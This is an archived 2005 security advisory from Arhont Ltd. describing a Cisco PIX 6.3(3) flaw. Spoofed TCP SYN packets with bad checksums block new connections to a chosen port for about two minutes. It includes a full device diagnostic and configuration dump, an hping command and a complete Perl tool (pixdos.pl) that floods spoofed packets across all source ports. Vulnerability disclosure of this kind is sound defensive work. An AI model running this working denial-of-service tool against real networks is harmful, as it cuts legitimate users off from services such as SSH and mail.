<<< Date Index >>>     <<< Thread Index >>>

Cisco PIX TCP Connection Prevention



Arhont Ltd.- Information Security

Arhont Advisory by:     Konstantin V. Gavrilenko (http://www.arhont.com)
Advisory:               Cisco PIX TCP Connection Prevention
Class:                  design bug
Version:                Tested on PIX515E, PIX OS version 6.3(3)
Model Specific:         Other versions might have the same bug


DETAILS:
In a situation when a host is located on the trusted side of the network
behind the PIX firewall, there is a possibility to prevent a new
legitimate TCP connection to be established to the host located on the
other side of the firewall. In order to execute such an attack, an
attacker would send a specifically crafted TCP packet with a set
incorrect cheksum through the PIX firewall pretending to be originated
from a legitimate host. S/he would need to specify the source and
destination IP and port, and once such packet is received by the PIX
firewall, there is no possibility to establish a new TCP session with
the credentials specified in the malicious packet. The downtime of the
connection is around 2 minutes 2 seconds, after which the new connection
can be established again and the PIX resumes the normal operation mode.
Such attack does not affect the connections that are already established
through the PIX.

Although, it would take a lot of packets to disrupt the communication
between the hosts completely, we assume that the attacker's aim is to
prevent the communication to a specific service on the remote hosts,
e.g. SSH, SMTP, TCP-syslog, and it takes around 15 seconds to generate
and spit out 65535 packets with a custom source port on a 100mbit lan.

The attack was tested on a PIX firewall 515E with 64Mb of RAM performing
a NAT on the external interface, the configuration file is attached.

The custom packet can be easily generated by hping2 as following:

arhontus / # hping -c 1 -S -s 31337 -k -b -p 22 192.168.xx.xxx


Allowing just one packet through the PIX FW will block the forthcoming
packet from port 31337 to port 22 for a duration of just over 2 minutes.

The sample perl script that is used to automate source port increments
and generate malicious packets is attached.


RISK FACTOR: Medium


WORKAROUNDS: Await Cisco advice on details of the workarounds.


COMMUNICATION HISTORY:
PSIRT notified on 10/10/2005
P release on 22/11/2005


ADDITIONAL INFORMATION:
pixdos.pl tool is attached to this e-mail.

*According to the Arhont Ltd. policy, all of the found vulnerabilities
and security issues will be reported to the manufacturer at least 7 days
before releasing them to the public domains (such as CERT and BUGTRAQ).

If you would like to get more information about this issue, please do
not hesitate to contact Arhont team on info@xxxxxxxxxx


APPENDIX 1. Show Tech output:

pixfw# sh tech

Cisco PIX Firewall Version 6.3(3)
Cisco PIX Device Manager Version 3.0(1)

Compiled on Wed 13-Aug-03 13:55 by morlee

pixfw up 44 days 19 hours

Hardware:   PIX-515E, 64 MB RAM, CPU Pentium II 433 MHz
Flash E28F128J3 @ 0x300, 16MB
BIOS Flash AM29F400B @ 0xfffd8000, 32KB

0: ethernet0: address is 0090.2799.118f, irq 10
1: ethernet1: address is 0090.2799.11b6, irq 11
2: ethernet2: address is 00a4.0080.d29c, irq 11
Licensed Features:
Failover:                    Disabled
VPN-DES:                     Enabled
VPN-3DES-AES:                Disabled
Maximum Physical Interfaces: 3
Maximum Interfaces:          5
Cut-through Proxy:           Enabled
Guards:                      Enabled
URL-filtering:               Enabled
Inside Hosts:                Unlimited
Throughput:                  Unlimited
IKE peers:                   Unlimited

This PIX has a Restricted (R) license.

Serial Number: 806330010 (0x300f9e9a)
Running Activation Key: 0x50c39a05 0x17a94508 0x39b8204a 0x50691aba
Configuration last modified by enable_15 at 19:04:14.354 UTC Sun Feb 14 1993

------------------ show clock ------------------

19:05:11.235 UTC Sun Feb 14 1993

------------------ show memory ------------------

Free memory:        49178768 bytes
Used memory:        17930096 bytes
-------------     ----------------
Total memory:       67108864 bytes

------------------ show conn count ------------------

99 in use, 4993 most used

------------------ show xlate count ------------------

175 in use, 176 most used

------------------ show blocks ------------------

  SIZE    MAX    LOW    CNT
     4   1600   1588   1599
    80    400    397    400
   256   1012    912   1011
  1550   1189    595    801

------------------ show interface ------------------

interface ethernet0 "outside" is up, line protocol is up
  Hardware is i82559 ethernet, address is 0090.2799.118f
  IP address *********, subnet mask 255.255.255.0
  MTU 1500 bytes, BW 100000 Kbit full duplex
        393729057 packets input, 3005934690 bytes, 0 no buffer
        Received 56994 broadcasts, 0 runts, 0 giants
        0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
        368741691 packets output, 3096620746 bytes, 0 underruns
        0 output errors, 0 collisions, 0 interface resets
        0 babbles, 0 late collisions, 0 deferred
        0 lost carrier, 0 no carrier
        input queue (curr/max blocks): hardware (128/128) software (0/22)
        output queue (curr/max blocks): hardware (0/100) software (0/1)
interface ethernet1 "inside" is up, line protocol is up
  Hardware is i82559 ethernet, address is 0090.2799.11b6
  IP address *********, subnet mask 255.255.255.0
  MTU 1500 bytes, BW 100000 Kbit full duplex
        368500878 packets input, 3132746326 bytes, 0 no buffer
        Received 36698 broadcasts, 0 runts, 0 giants
        0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
        393715693 packets output, 2991713049 bytes, 0 underruns
        0 output errors, 0 collisions, 0 interface resets
        0 babbles, 0 late collisions, 0 deferred
        0 lost carrier, 0 no carrier
        input queue (curr/max blocks): hardware (128/128) software (0/54)
        output queue (curr/max blocks): hardware (1/48) software (0/1)
interface ethernet2 "intf2" is administratively down, line protocol is down
  Hardware is i82559 ethernet, address is 00a4.0080.d29c
  MTU 1500 bytes, BW 10000 Kbit half duplex
        0 packets input, 0 bytes, 0 no buffer
        Received 0 broadcasts, 0 runts, 0 giants
        0 input errors, 0 CRC, 0 frame, 0 overrun, 0 ignored, 0 abort
        0 packets output, 0 bytes, 0 underruns
        0 output errors, 0 collisions, 0 interface resets
        0 babbles, 0 late collisions, 0 deferred
        0 lost carrier, 0 no carrier
        input queue (curr/max blocks): hardware (128/128) software (0/0)
        output queue (curr/max blocks): hardware (0/0) software (0/0)

------------------ show cpu usage ------------------

CPU utilization for 5 seconds = 0%; 1 minute: 3%; 5 minutes: 2%

------------------ show process ------------------


    PC       SP       STATE       Runtime    SBASE     Stack Process
Hsi 001eaa09 008ba2dc 00555860          0 008b9354 3628/4096 arp_timer
Lsi 001effad 0095d4d4 00555860          0 0095c55c 3816/4096 FragDBGC
Lwe 00119abf 009de6c4 00558fc0          0 009dd85c 3688/4096 dbgtrace
Lwe 003e3f55 009e0854 0054e188      21240 009de90c 6184/8192 Logger
Hsi 003e806d 009e394c 00555860          0 009e19d4 8024/8192 tcp_fast
Hsi 003e7f0d 009e59fc 00555860          0 009e3a84 8024/8192 tcp_slow
Lsi 003006f9 00b1bfec 00555860          0 00b1b064 3944/4096 xlate clean
Lsi 00300607 00b1d08c 00555860          0 00b1c114 3884/4096 uxlate clean
Mwe 002f82d3 00cb548c 00555860          0 00cb34f4 7908/8192
tcp_intercept_timer_process
Lsi 0043a545 00d5fd44 00555860          0 00d5edbc 3900/4096 route_process
Hsi 002e80f4 00d60dd4 00555860          0 00d5fe6c 2748/4096 PIX Garbage
Collector
Hwe 00217101 00d6af04 00555860          0 00d66f9c 16048/16384
isakmp_time_keeper
Lsi 002e5e74 00d8528c 00555860          0 00d84304 3944/4096 perfmon
Mwe 0020e719 00daf6bc 00555860          0 00dad744 7860/8192 IPsec timer
handler
Hwe 0039a4db 00dc416c 00570980          0 00dc2224 7000/8192
qos_metric_daemon
Mwe 00261395 00ddeca4 00555860          0 00ddad3c 15592/16384 IP Background
Lwe 002f8f4a 00e915f4 0056bc98          0 00e9077c 3704/4096 pix/trace
Lwe 002f9182 00e926a4 0056c3c8          0 00e9182c 3704/4096 pix/tconsole
Hwe 0011f217 00e9e65c 00502bc0          0 00e9ab94 14732/16384 ci/console
Csi 002f0fd3 00e9fb9c 00555860          0 00e9ec44 3540/4096
update_cpu_usage
Hwe 002dcba1 00f43b34 00534c00          0 00f3fcac 15884/16384 uauth_in
Hwe 003e6b5d 00f45c34 009927a8          0 00f43d5c 7896/8192 uauth_thread
Hwe 003fce0a 00f46d84 0054e788          0 00f45e0c 3960/4096 udp_timer
Hsi 001e2636 00f48a44 00555860          0 00f47acc 3928/4096 557mcfix
Crd 001e25eb 00f49b04 00555cd8 3114406700 00f48b7c 3684/4096 557poll
Lsi 001e26a5 00f4aba4 00555860          0 00f49c2c 3848/4096 557timer
Cwe 001e4229 00f60c7c 0079b338    3039940 00f5ed84 5208/8192 pix/intf0
Mwe 003fcb7a 00f61d8c 009db3d0          0 00f60e54 3896/4096 riprx/0
Msi 003a3999 00f62e9c 00555860          0 00f61f24 3524/4096 riptx/0
Cwe 001e4229 00f69034 00725dc8    3054440 00f6713c 4876/8192 pix/intf1
Mwe 003fcb7a 00f6a144 009db388          0 00f6920c 3896/4096 riprx/1
Msi 003a3999 00f6b254 00555860          0 00f6a2dc 3888/4096 riptx/1
Cwe 001eccfd 00f7145c 00886978          0 00f6f4f4 8040/8192 pix/intf2
Mwe 003fcb7a 00f724fc 009db340          0 00f715c4 3896/4096 riprx/2
Msi 003a3999 00f7360c 00555860          0 00f72694 3888/4096 riptx/2
Mwe 003fcb7a 00fe66a4 009db268          0 00fe477c 7644/8192 radius_rcvauth
Mwe 003fcb7a 00fe7754 009db220          0 00fe682c 3548/4096 radius_rcvacct
Mwe 0039bd42 00fe8854 00547f48          0 00fe78dc 3960/4096 radius_snd
Hwe 003e6df1 00fe8c64 00968f30          0 00fe89bc  284/1024 listen/http1
Hwe 003fcb7a 00fe9814 009db2b0          0 00fe8e6c 2356/4096 snmp
Hwe 003fcb7a 00fea434 009db2f8          0 00fea0ec  840/1024 snmp_ex
Hwe 003e6df1 00feac24 00969028          0 00fea9dc  172/1024 listen/pfm
Hwe 003e6df1 00feb4fc 00969120          0 00feaeb4 1196/2048 listen/telnet_1
Hwe 003e6df1 00febe04 00969218          0 00feb7bc 1196/2048 listen/ssh_1
Mwe 00370852 00fee65c 00555860        600 00fec6e4 5476/8192 Crypto CA
Mwe 003e0b11 00ffab64 00555860          0 00ff8bec 6440/8192 ssh/timer
M*  003d9c8c 0009ff2c 00555898        460 010f4ccc 3992/8192 ssh

------------------ show failover ------------------

No license for Failover

------------------ show traffic ------------------

outside:
        received (in 3870403.800 secs):
                393818423 packets       3019023411 bytes
                0 pkts/sec      1 bytes/sec
        transmitted (in 3870403.800 secs):
                368984754 packets       3401126889 bytes
                1 pkts/sec      0 bytes/sec
inside:
        received (in 3870404.160 secs):
                368698713 packets       3380524010 bytes
                0 pkts/sec      0 bytes/sec
        transmitted (in 3870404.160 secs):
                393788677 packets       3002331521 bytes
                0 pkts/sec      0 bytes/sec
intf2:
        received (in 3870404.160 secs):
                0 packets       0 bytes
                0 pkts/sec      0 bytes/sec
        transmitted (in 3870404.160 secs):
                0 packets       0 bytes
                0 pkts/sec      0 bytes/sec

------------------ show perfmon ------------------


PERFMON STATS:    Current      Average
Xlates               4/s          0/s
Connections          4/s          0/s
TCP Conns            4/s          0/s
UDP Conns            0/s          0/s
URL Access           0/s          0/s
URL Server Req       0/s          0/s
TCP Fixup         1236/s          0/s
TCPIntercept         0/s          0/s
HTTP Fixup           0/s          0/s
FTP Fixup            0/s          0/s
AAA Authen           0/s          0/s
AAA Author           0/s          0/s
AAA Account          0/s          0/s

------------------ show running-config ------------------

: Saved
:
PIX Version 6.3(3)
interface ethernet0 auto
interface ethernet1 auto
interface ethernet2 auto shutdown
nameif ethernet0 outside security0
nameif ethernet1 inside security100
nameif ethernet2 intf2 security4
enable password ******** encrypted
passwd ********* encrypted
hostname pixfw
domain-name testing.arhont.com
fixup protocol dns maximum-length 512
fixup protocol ftp 21
fixup protocol h323 h225 1720
fixup protocol h323 ras 1718-1719
fixup protocol http 80
fixup protocol rsh 514
fixup protocol rtsp 554
fixup protocol sip 5060
fixup protocol sip udp 5060
fixup protocol skinny 2000
fixup protocol smtp 25
fixup protocol sqlnet 1521
fixup protocol tftp 69
names
access-list acl_inbound permit icmp any any echo-reply
access-list acl_inbound permit icmp any any time-exceeded
access-list acl_inbound permit icmp any any unreachable
<access list entries skipped>
pager lines 24
logging on
logging timestamp
logging buffered warnings
logging trap warnings
logging history warnings
logging device-id hostname
logging host outside *********
mtu outside 1500
mtu inside 1500
mtu intf2 1500
ip address outside ********
ip address inside *******
no ip address intf2
ip audit info action alarm
ip audit attack action alarm
pdm location ********* 255.255.255.0 inside
pdm logging warnings 100
pdm history enable
arp timeout 14400
global (outside) 1
global (outside) 2
global (outside) 3
global (outside) 4
global (outside) 5
nat (inside) 1 access-list forcenat-105 0 0
nat (inside) 2 access-list forcenat-9 0 0
nat (inside) 3 access-list forcenat-1-net 0 0
nat (inside) 4 access-list forcenat-10-net 0 0
nat (inside) 5 access-list forcenat-11-net 0 0
nat (inside) 0 ********* 255.255.255.0 0 0
access-group acl_inbound in interface outside
rip outside default version 2 authentication md5 ******** 1
route outside 0.0.0.0 0.0.0.0 ********* 1
timeout xlate 3:00:00
timeout conn 3:00:00 half-closed 0:10:00 udp 0:02:00 rpc 0:10:00 h225
1:00:00
timeout h323 0:05:00 mgcp 0:05:00 sip 0:30:00 sip_media 0:02:00
timeout uauth 0:05:00 absolute
aaa-server radius-acctport 1813
aaa-server TACACS+ protocol tacacs+
aaa-server RADIUS protocol radius
aaa-server RADIUS (outside) host ******** ******** timeout 20
aaa-server LOCAL protocol local
http server enable
http ********** 255.255.255.0 inside
snmp-server host inside *********** trap
snmp-server location Yuggoth
snmp-server contact Kthulhu
snmp-server community public
snmp-server enable traps
floodguard enable
crypto ipsec transform-set kosts esp-des esp-sha-hmac
crypto map kosmap 10 ipsec-isakmp
crypto map kosmap 10 match address 110
crypto map kosmap 10 set pfs group2
crypto map kosmap 10 set peer **********
crypto map kosmap 10 set transform-set kosts
crypto map kosmap 10 set security-association lifetime seconds 600
kilobytes 4608000
isakmp key ******** address ********* netmask 255.255.255.255
isakmp policy 10 authentication pre-share
isakmp policy 10 encryption des
isakmp policy 10 hash sha
isakmp policy 10 group 2
isakmp policy 10 lifetime 3600
telnet ********* 255.255.255.0 inside
telnet timeout 60
ssh ********* 255.255.255.0 inside
ssh timeout 30
console timeout 0
terminal width 80
Cryptochecksum:b4a63a116c67521e09fbbbc9fdec895e
: end



--
Respectfully,
Konstantin V. Gavrilenko

Arhont Ltd - Information Security

web:    http://www.arhont.com
        http://www.wi-foo.com
e-mail: k.gavrilenko@xxxxxxxxxx

tel: +44 (0) 870 44 31337
fax: +44 (0) 117 969 0141

PGP: Key ID - 0xE81824F4
PGP: Server - keyserver.pgp.com

#!/usr/bin/perl
eval ("use Getopt::Long;");die "[error] Getopt::Long perl module is not 
installed \n" if $@;
eval ("use Net::RawIP;");die "[error] Net::RawIP   perl module is not installed 
\n" if $@;
eval ("use Term::ProgressBar;");die "[error] Term::ProgressBar perl module is 
not installed \n" if $@;
my $VERSION = "0.1";
print "$0, $PgmName, V $VERSION \n";
GetOptions ( 
            "help" =>\$usage,
            "device=s" => \$device, 
            "source=s" =>\$sourceip,
            "dest=s"=>\$destip,
            "sourcemac=s"=>\$sourcemac,
            "destmac=s"=>\$destmac,
            "port=n"=> \$tcpport,
            );

######################## Config option 
#############################################

my $timeout = "0,1"; # Timeout

if ($usage) {&usage;} 
              
if (!$device) {
 $device= 'eth0'; # Network device
}

if (!$destmac) {print "Dest MAC not found \n"; &usage;}
if (!$sourceip) {print "Source IP not found \n"; &usage;}
if (!$destip) {print "Dest IP not found \n"; &usage;}
if (!$tcpport) {print "TCP port not found \n"; &usage;}

my $syn="1"; # TCP SYN SET
my $tcpdata = "TEST";          # TCP payload
my $count=0;

####################################################################################

#Initialize Progres Bar 
my $progress = Term::ProgressBar->new(32768);
$progress->minor(0);
$packet = new Net::RawIP;
$packet-> ethnew($device);


if (!$sourcemac) {
$packet -> ethset( dest => $destmac);
}else { 
$packet -> ethset( source =>$sourcemac, dest => $destmac);
}



for ($count=0; $count< 65537 ; $count++) {

$packet->set({

ip => {
saddr => $sourceip,
daddr => $destip 
},

tcp => {
        check => 0x0010 , # TCP Packet Checksum 0 for auto correct
        source => $count,
        dest => $tcpport,
        syn => $syn,
        data => $tcpdata
       }});
$packet->ethsend($timeout);
#$packet->send($timeout);

$progress->update($_);
$count++;
}

sub usage {
  print <<EOF ;
This program was originally written in the due course of writing
"Hacking Exposed Cisco Networks: Cisco Security Secrets and Solutions" book.
Tool author - Janis Vizulis, Arhont Ltd. (License GPL-2 ) Please send bugs 
and comments to info@xxxxxxxxxx 

usage: $0 [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=MAC]
          [--destmac=MAC] [--port=n]

Options:

  --help                This message
  --device              Network interface (defaut set eth0)
  --source              Victim source IP
  --dest                Victim destination IP
  --sourcemac           Victim source MAC
  --destmac             MAC Address of the gateway
  --port                TCP port 
  
Example: ./pixdos.pl --device eth0 --source 192.168.44.10 --dest 192.168.55.111 
\
  --sourcemac 00:90:27:99:11:b6 --destmac 00:60:27:99:11:b6 --port 22 
EOF
  
  exit shift;
}